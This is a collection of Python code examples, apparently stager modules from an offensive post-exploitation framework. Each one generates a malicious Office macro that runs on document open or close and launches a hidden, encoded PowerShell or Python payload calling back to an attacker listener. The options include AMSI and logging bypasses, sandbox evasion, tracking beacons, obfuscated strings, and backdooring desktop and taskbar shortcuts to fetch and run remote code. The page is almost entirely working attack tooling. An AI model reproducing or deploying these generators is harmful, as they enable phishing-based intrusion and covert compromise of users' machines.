Exemple #1
0
    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
        Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
        Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim "+Str+" As String\n"
            payload += "\t"+Str+" = \"" + str(chunks[0]).replace("\"", "\"\"") + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t"+Str+" = "+Str+" + \"" + str(chunk).replace("\"", "\"\"") + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"
            macro = "Sub AutoOpen()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"

            macro += "Public Function "+Method+"() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #2
0
    def generate(self):

        # extract all of our options
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        noiselevel = int(self.options['NoiseLevel']['Value'])

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            launcher, noise = self.addnoise(launcher, noiselevel)
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim Str As String\n"
            payload += "\tDim Noise As String\n"
            payload += "\tDim Counter As Integer\n"
            payload += "\tnoise = \"" + noise + "\"\n"
            payload += "\tstr = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tstr = str + \"" + str(chunk) + "\"\n"

            payload += "\tFor counter = 1 to len(noise)\n"
            payload += "\tstr = replace(str,mid(noise,counter,1),\"\")\n"
            payload += "\tNext\n"

            macro = "Sub Auto_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"
            macro = "Sub AutoOpen()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Public Function Debugging() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #3
0
    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim Str As String\n"
            payload += "\tstr = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tstr = str + \"" + str(chunk) + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"
            macro = "Sub AutoOpen()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Public Function Debugging() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #4
0
    def generate(self):
        def formStr(varstr, instr):
            holder = []
            str1 = ''
            str2 = ''
            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in range(54, len(instr), 48):
                holder.append('\t\t' + varstr + ' = ' + varstr + ' + "' +
                              instr[i:i + 48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n" + str2
            return str1

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        pixelTrackURL = self.options['PixelTrackURL']['Value']
        scriptLogBypass = self.options['ScriptLogBypass']['Value']
        AMSIBypass = self.options['AMSIBypass']['Value']
        AMSIBypass2 = self.options['AMSIBypass2']['Value']

        invokeObfuscation = False
        if obfuscate.lower() == "true":
            invokeObfuscation = True

        scriptLogBypassBool = False
        if scriptLogBypass.lower() == "true":
            scriptLogBypassBool = True

        AMSIBypassBool = False
        if AMSIBypass.lower() == "true":
            AMSIBypassBool = True

        AMSIBypass2Bool = False
        if AMSIBypass2.lower() == "true":
            AMSIBypass2Bool = True

        # generate the python launcher code
        pylauncher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language="python",
            encode=True,
            userAgent=userAgent,
            safeChecks=safeChecks)

        if pylauncher == "":
            print(
                helpers.color(
                    "[!] Error in python launcher command generation."))
            return ""

        # render python launcher into python payload
        pylauncher = pylauncher.replace("\"", "\"\"")
        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
            pypayload = formStr("str", match)

        # generate the powershell launcher code
        poshlauncher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            obfuscate=invokeObfuscation,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries,
            safeChecks=safeChecks,
            scriptLogBypass=scriptLogBypassBool,
            AMSIBypass=AMSIBypassBool,
            AMSIBypass2=AMSIBypass2Bool)

        if poshlauncher == "":
            print(
                helpers.color(
                    "[!] Error in powershell launcher command generation."))
            return ""

        # render powershell launcher into powershell payload
        poshchunks = list(helpers.chunks(poshlauncher, 50))
        poshpayload = "Dim Str As String"
        poshpayload += "\n\t\tstr = \"" + str(poshchunks[0])

        for poshchunk in poshchunks[1:]:
            poshpayload += "\n\t\tstr = str + \"" + str(poshchunk)

        # if statements below are for loading Mac dylibs for compatibility
        macro = """#If Mac Then
    #If VBA7 Then
        Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
    #Else
        Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
    #End If
#End If

Sub AutoOpen()
    'MsgBox("AutoOpen()")
    Debugging
End Sub

Sub Auto_Open()
    'MsgBox("Auto_Open()")
    Debugging
End Sub

Sub Document_Open()
    'MsgBox("Document_Open()")
    Debugging
End Sub

Public Function Debugging() As Variant
    On Error Resume Next
            Dim tracking As String
            tracking = "%s"
            #If Mac Then
                'Mac Rendering
                If Val(Application.Version) < 15 Then 'Mac Office 2011
                    system ("curl " & tracking & "Mac2011")
                Else 'Mac Office 2016
                    system ("curl " & tracking & "Mac2016")
                End If
                Dim result As Long
                Dim str As String
                %s
                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &")
                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &")
            #Else
                'Windows Rendering
                Dim objWeb As Object
                Set objWeb = CreateObject("Microsoft.XMLHTTP")
                objWeb.Open "GET", tracking & "Windows", False
                objWeb.send
                %s
                'MsgBox(str)
                Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2")
                Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                Set objConfig = objStartup.SpawnInstance_
                objConfig.ShowWindow = 0
                Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process")
                objProcess.Create str, Null, objConfig, intProcessID
            #End If
End Function""" % (pixelTrackURL, pypayload, poshpayload)

        return macro
Exemple #5
0
    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            obfuscate=obfuscateScript,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)
        Str = ''.join(
            random.choice(string.letters)
            for i in range(random.randint(1, len(listenerName))))
        Method = ''.join(
            random.choice(string.letters)
            for i in range(random.randint(1, len(listenerName))))

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim " + Str + " As String\n"
            payload += "\t" + Str + " = \"" + str(chunks[0]).replace(
                "\"", "\"\"") + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t" + Str + " = " + Str + " + \"" + str(
                    chunk).replace("\"", "\"\"") + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"
            macro += "Sub AutoOpen()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            macro += "Public Function " + Method + "() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create " + Str + ", Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        scriptLogBypass = self.options['ScriptLogBypass']['Value']
        AMSIBypass = self.options['AMSIBypass']['Value']
        AMSIBypass2 = self.options['AMSIBypass2']['Value']
        OutlookEvasion = self.options['OutlookEvasion']['Value']

        encode = False
        if base64.lower() == "true":
            encode = True

        invokeObfuscation = False
        if obfuscate.lower() == "true":
            invokeObfuscation = True

        scriptLogBypassBool = False
        if scriptLogBypass.lower() == "true":
            scriptLogBypassBool = True

        AMSIBypassBool = False
        if AMSIBypass.lower() == "true":
            AMSIBypassBool = True

        AMSIBypass2Bool = False
        if AMSIBypass2.lower() == "true":
            AMSIBypass2Bool = True

        OutlookEvasionBool = False
        if OutlookEvasion.lower() == "true":
            OutlookEvasionBool = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=encode,
            obfuscate=invokeObfuscation,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries,
            safeChecks=safeChecks,
            scriptLogBypass=scriptLogBypassBool,
            AMSIBypass=AMSIBypassBool,
            AMSIBypass2=AMSIBypass2Bool)
        Str = ''.join(
            random.choice(string.ascii_letters)
            for i in range(random.randint(1, len(listenerName))))
        Method = ''.join(
            random.choice(string.ascii_letters)
            for i in range(random.randint(1, len(listenerName))))

        if launcher == "":
            print(helpers.color("[!] Error in launcher command generation."))
            return ""
        else:
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim " + Str + " As String\n"
            payload += "\t" + Str + " = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t" + Str + " = " + Str + " + \"" + str(
                    chunk) + "\"\n"

            macro = "Sub AutoClose()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            macro += "Public Function " + Method + "() As Variant\n"

            if OutlookEvasionBool == True:
                macro += "\tstrComputer = \".\"\n"
                macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\cimv2\")\n"
                macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
                macro += "\tFor Each objItem In ID\n"
                macro += "\t\tIf StrComp(objItem.IdentifyingNumber, \"2UA20511KN\") = 0 Then End\n"
                macro += "\tNext\n"
                macro += "\tSet disksize = objWMIService.ExecQuery(\"Select Size from Win32_logicaldisk\")\n"
                macro += "\tFor Each objItem In disksize\n"
                macro += "\t\tIf (objItem.Size = 42949603328#) Then End\n"
                macro += "\t\tIf (objItem.Size = 68719443968#) Then End\n"
                macro += "\tNext\n"

            macro += payload
            macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n"
            macro += "\tasd.Run(" + Str + ")\n"
            macro += "End Function\n"

            return macro
Exemple #7
0
    def generate(self):
        def formStr(varstr, instr):
            holder = []
            str1 = ''
            str2 = ''
            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in xrange(54, len(instr), 48):
                holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n"+str2
            return str1

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        pixelTrackURL = self.options['PixelTrackURL']['Value']

        # generate the python launcher code
        pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)

        if pylauncher == "":
            print helpers.color("[!] Error in python launcher command generation.")
            return ""

        # render python launcher into python payload
        pylauncher = pylauncher.replace("\"", "\"\"")
        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
            pypayload = formStr("str", match)

        # generate the powershell launcher code
        poshlauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="powershell", encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

        if poshlauncher == "":
            print helpers.color("[!] Error in powershell launcher command generation.")
            return ""

        # render powershell launcher into powershell payload
        poshchunks = list(helpers.chunks(poshlauncher, 50))
        poshpayload = "Dim Str As String"
        poshpayload += "\n\t\tstr = \"" + str(poshchunks[0])
        for poshchunk in poshchunks[1:]:
            poshpayload += "\n\t\tstr = str + \"" + str(poshchunk)

        # if statements below are for loading Mac dylibs for compatibility
        macro = """#If Mac Then
    #If VBA7 Then
        Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
    #Else
        Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
    #End If
#End If

Sub Auto_Open()
    'MsgBox("Auto_Open()")
    Debugging
End Sub

Sub Document_Open()
    'MsgBox("Document_Open()")
    Debugging
End Sub

Public Function Debugging() As Variant
    On Error Resume Next
            Dim tracking As String
            tracking = "%s"
            #If Mac Then
                'Mac Rendering
                If Val(Application.Version) < 15 Then 'Mac Office 2011
                    system ("curl " & tracking & "Mac2011")
                Else 'Mac Office 2016
                    system ("curl " & tracking & "Mac2016")
                End If
                Dim result As Long
                Dim str As String
                %s
                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
            #Else
                'Windows Rendering
                Dim objWeb As Object
                Set objWeb = CreateObject("Microsoft.XMLHTTP")
                objWeb.Open "GET", tracking & "Windows", False
                objWeb.send
                %s
                'MsgBox(str)
                Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2")
                Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                Set objConfig = objStartup.SpawnInstance_
                objConfig.ShowWindow = 0
                Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process")
                objProcess.Create str, Null, objConfig, intProcessID
            #End If
End Function""" % (pixelTrackURL, pypayload, poshpayload)

        return macro
    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
	lnkPath = self.options['LNKPath']['Value']
	XmlPath = self.options['XmlUrl']['Value']
	XmlOut = self.options['XmlOutFile']['Value']
	regParts = XmlPath.split("\\")
	path = "\\".join(regParts[0:len(regParts)-1])
	name = regParts[len(regParts)-1]

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
	launcher = launcher.split(" ")[-1]

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim encRP As String\n"
            payload += "\tencRP = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tencRP = encRP + \"" + str(chunk) + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\tOffice\n"
            macro += "End Sub\n\n"


            macro += "Public Function Office() As Variant\n"
           # macro += payload
	
	    macro += "Dim myWS As Object, lnk as Object\n"
	    macro += "Set myWS = CreateObject(\"Wscript.Shell\")\n"
#set up first link - creates / replaces iexplore.lnk (display name iexplore) on users desktop if it sees it
	    macro += "Set lnk = myWS.CreateShortcut(myWS.SPecialFolders(\"desktop\") & \"\\iexplore.lnk\")\n"
	    
	    launchString1 = "[System.Diagnostics.Process]::Start(\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\");$b = New-Object System.Xml.XmlDocument;$b.Load(\""
	    launchString2 = "\");[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\n"

	    macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n"

	    launchString1 = helpers.randomize_capitalization(launchString1)
	    launchString2 = helpers.randomize_capitalization(launchString2)
	    launchString = launchString1 + XmlPath + launchString2
	    encLaunch = helpers.enc_powershell(launchString)
	    macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n"
	    macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n"
	    macro += "lnk.save\n"


#2nd link here -- will overwite ie if it finds a file named 'Internet Explorer' in the taskbar menu
	    macro += "Set lnk = myWS.CreateShortcut(Environ(\"AppData\") & \"\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk\")\n"
	    macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n"
	    macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n"
	    macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n"
	    macro += "lnk.save\n"
	    macro += "End Function\n"

#write XML to disk

	    f = open(XmlOut,"w")
	    f.write("<?xml version=\"1.0\"?>\n")
	    f.write("<command>\n")
	    f.write("\t<a>\n")
	    f.write("\t<execute>"+launcher+"</execute>\n")
	    f.write("\t</a>\n")
	    f.write("</command>\n")

            return macro
    def generate(self):

        # setting variables
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        targetEXE = self.options['TargetEXEs']['Value']
        XmlPath = self.options['XmlUrl']['Value']
        XmlOut = self.options['XmlOutFile']['Value']
        targetEXE = targetEXE.split(',')
        targetEXE = filter(None, targetEXE)

        fncDecryptName = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 15)))
        shellVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        lnkVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        fsoVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        folderVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        fileVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        encStrVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        tempStrVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        shiftVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        offsetVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        blockVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))

        # generate the launcher
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)
        launcher = launcher.split(" ")[-1]

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            #build out the macro - will look for all .lnk files on the desktop, any that it finds it will inspect to determine whether it matches any of the target exe names
            macro = "Sub Auto_Close()\n"
            #macro += "Dim " + shellVar + " As Object, " + lnkVar + " as Object, " + blockVar + " as String\n"
            macro += "Set " + shellVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder(
                "Wscript.Shell") + "\"))\n"
            macro += "Set " + fsoVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder(
                "Scripting.FileSystemObject") + "\"))\n"
            macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(\"desktop\"))\n"
            macro += "For Each " + fileVar + " In " + folderVar + ".Files\n"
            macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n"
            macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(\"desktop\") & \"\\\" & " + fileVar + ".name)\n"
            macro += "If("
            for i, item in enumerate(targetEXE):
                if i:
                    macro += (' or ')
                macro += "InStr(Lcase(" + lnkVar + ".targetPath), " + fncDecryptName + "(\"" + self.encoder(
                    targetEXE[i].strip().lower() + ".") + "\"))"
            macro += ") Then\n"

            #writing out and obfuscating the command that will be executed upon clicking the backdoored .lnk
            launchString1 = " -w hidden -nop -command \"[System.Diagnostics.Process]::Start(\'"
            launchString2 = "& " + lnkVar + ".targetPath & "
            launchString3 = "\');$u=New-Object -comObject wscript.shell;Get-ChildItem -Path $env:USERPROFILE\desktop -Filter *.lnk | foreach { $lnk = $u.createShortcut($_.FullName); if($lnk.arguments -like \'*xml.xmldocument*\') {$start = $lnk.arguments.IndexOf(\'\'\'\') + 1; $result = $lnk.arguments.Substring($start, $lnk.arguments.IndexOf(\'\'\'\', $start) - $start );$lnk.targetPath = $result; $lnk.Arguments = \'\'; $lnk.Save()}};$b = New-Object System.Xml.XmlDocument;$b.Load(\'"

            launchString4 = "\');[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\""
            launchString1 = helpers.randomize_capitalization(launchString1)
            launchString2 = helpers.randomize_capitalization(launchString2)
            launchString3 = helpers.randomize_capitalization(launchString3)
            launchString4 = helpers.randomize_capitalization(launchString4)

            #the encoded script gets long, this snippet chunks data to a more manageable size, keeps vbscript from erroring out due to a line over 1023 chars
            chunks = list(
                helpers.chunks(
                    self.encoder(launchString3 + XmlPath + launchString4),
                    random.randint(600, 750)))
            macro += blockVar + " = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                macro += blockVar + " = " + blockVar + " + \"" + str(
                    chunk) + "\"\n"

#part of the macro that actually modifies the LNK files on the desktop, sets iconlocation for updated lnk to the old targetpath, args to our launch code, and target to powershell so we can do a direct call to it
            macro += lnkVar + ".IconLocation = " + lnkVar + ".targetpath\n"
            launchString = fncDecryptName + "(\"" + self.encoder(
                launchString1
            ) + "\")" + launchString2 + fncDecryptName + "(" + blockVar + ")\n"
            macro += lnkVar + ".arguments = " + launchString
            macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & " + fncDecryptName + "(\"" + self.encoder(
                ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
            ) + "\")\n"
            macro += lnkVar + ".save\n"
            macro += "end if\n"
            macro += "end if\n"
            macro += "next " + fileVar + "\n"
            macro += "End Sub\n\n"

            #de-obfuscation function written into macro, this is called at the macro's runtime and converts obfuscated text back to ascii
            macro += "Function " + fncDecryptName + "(" + encStrVar + ") as String\n"
            macro += "Dim " + tempStrVar + ", " + shiftVar + ", " + offsetVar + "\n"
            macro += shiftVar + " = CLng(\"&H\" & Left(" + encStrVar + ", 1))\n"
            macro += offsetVar + " = CLng(\"&H\" & Mid(" + encStrVar + ", 2, 2)) + 4\n"
            macro += "For i = " + offsetVar + " To Len(" + encStrVar + ") Step 3\n"
            macro += tempStrVar + " = " + tempStrVar + " & Chr(CLng(\"&H\" & Mid(" + encStrVar + ",i,2)) + " + shiftVar + ")\n"
            macro += "Next\n"
            macro += fncDecryptName + " = " + tempStrVar + "\n"
            macro += "End Function"

            #writes XML intermediate stager to disk
            print("Writing xml...\n")
            f = open(XmlOut, "w")
            f.write("<?xml version=\"1.0\"?>\n")
            f.write("<command>\n")
            f.write("\t<a>\n")
            f.write("\t<execute>" + launcher + "</execute>\n")
            f.write("\t</a>\n")
            f.write("</command>\n")
            print(
                "xml written to " + XmlOut +
                " please remember this file must be accessible by the target at this url: "
                + XmlPath + "\n")

            return macro